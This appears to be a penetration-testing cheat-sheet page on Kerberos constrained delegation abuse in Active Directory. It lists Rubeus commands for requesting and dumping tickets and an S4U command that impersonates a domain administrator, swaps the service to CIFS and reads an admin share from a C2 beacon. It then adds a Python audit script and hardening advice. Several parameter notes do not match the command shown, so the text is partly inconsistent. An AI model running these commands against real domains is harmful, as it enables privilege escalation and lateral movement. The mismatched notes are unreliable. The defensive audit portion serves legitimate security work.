Constrained Delegation
Constrained delegation was introduced as a safer means for services to perform Kerberos delegation. It restricts the services toward which a server can act on behalf of a user. The server no longer caches the TGTs of other users; instead, it uses its own TGT to request a service ticket (TGS) for another user.


```
# Verify: list accounts configured for constrained delegation
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# Generate a TGT with the account's credentials
Rubeus.exe asktgt /user:workstation1$ /rc4:<NTLM Hash>
Rubeus.exe asktgt /user:sqlservice /password:P@ssw0rd

# Generate a TGT from the user's session, or by dumping tickets
Rubeus.exe tgtdeleg
Rubeus.exe triage
Rubeus.exe dump

# S4U command
Rubeus.exe s4u /impersonateuser:administrator /msdsspn:time/workstation1.marvel.local /altservice:cifs /opsec /ptt /ticket:<TICKET>

beacon> ls \\wkstn-2.dev.cyberbotic.io\c$
```
- /impersonateuser is the user we want to impersonate. nlamb is a domain admin but you want to ensure this user has local admin access to the target (WKSTN-2).
- /msdsspn is the service principal name that SRV-2 is allowed to delegate to.
- /user is the principal allowed to perform the delegation.
- /aes256 is the AES256 key of the /user.
- /opsec tells Rubeus to more closely mimic genuine S4U2Self and S4U2Proxy requests (can only be used with aes256).
- /ptt tells Rubeus to pass the generated tickets directly into the current logon session.
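The configuration that the -TrustedToAuth enumeration above reports can be audited from the defender's side. The following is an added example, not part of the original page: it reads account records and flags constrained-delegation accounts, whether protocol transition is enabled, and privileged accounts that are not marked as sensitive. The record layout, the account and host names, and the `privileged` field are assumptions made for the example.

```python
# Added audit example. All records are constructed, not real directory data.
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # UAC bit: protocol transition allowed
NOT_DELEGATED = 0x100000  # UAC bit: "Account is sensitive and cannot be delegated"

# Constructed sample shaped like an LDAP export of sAMAccountName,
# userAccountControl and msDS-AllowedToDelegateTo. "privileged" is an assumed
# field, e.g. derived beforehand from admin group membership.
ACCOUNTS = [
    {"sam": "SRV-EXAMPLE$", "uac": 0x1000 | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "delegate_to": ["time/host1.example.local", "time/host1"], "privileged": False},
    {"sam": "svc-example", "uac": 0x200,
     "delegate_to": ["MSSQLSvc/db1.example.local:1433"], "privileged": False},
    {"sam": "admin-a", "uac": 0x200, "delegate_to": [], "privileged": True},
    {"sam": "admin-b", "uac": 0x200 | NOT_DELEGATED, "delegate_to": [], "privileged": True},
]

def spn_host(spn):
    """Return the lowercase host part of an SPN (class/host[:port][/name])."""
    _, _, rest = spn.partition("/")
    return rest.split("/", 1)[0].split(":", 1)[0].lower()

def audit(accounts):
    """Return (account, finding, hosts) tuples for delegation-related risk."""
    findings = []
    for a in accounts:
        if a["delegate_to"]:
            # Report hosts rather than service classes: the page's command
            # pairs /msdsspn:time/... with /altservice:cifs, so the listed
            # class does not bound what is reachable on that host.
            hosts = sorted({spn_host(s) for s in a["delegate_to"]})
            transition = a["uac"] & TRUSTED_TO_AUTH_FOR_DELEGATION
            kind = "protocol-transition" if transition else "kerberos-only"
            findings.append((a["sam"], "constrained-delegation:" + kind, hosts))
        if a["privileged"] and not a["uac"] & NOT_DELEGATED:
            # Without this flag the account can be impersonated through delegation.
            findings.append((a["sam"], "privileged-but-delegable", []))
    return findings

if __name__ == "__main__":
    for sam, finding, hosts in audit(ACCOUNTS):
        print(f"{sam:14} {finding:45} {', '.join(hosts)}")
```

Setting "Account is sensitive and cannot be delegated" on privileged accounts, or adding them to the Protected Users group, prevents them from being impersonated through delegation.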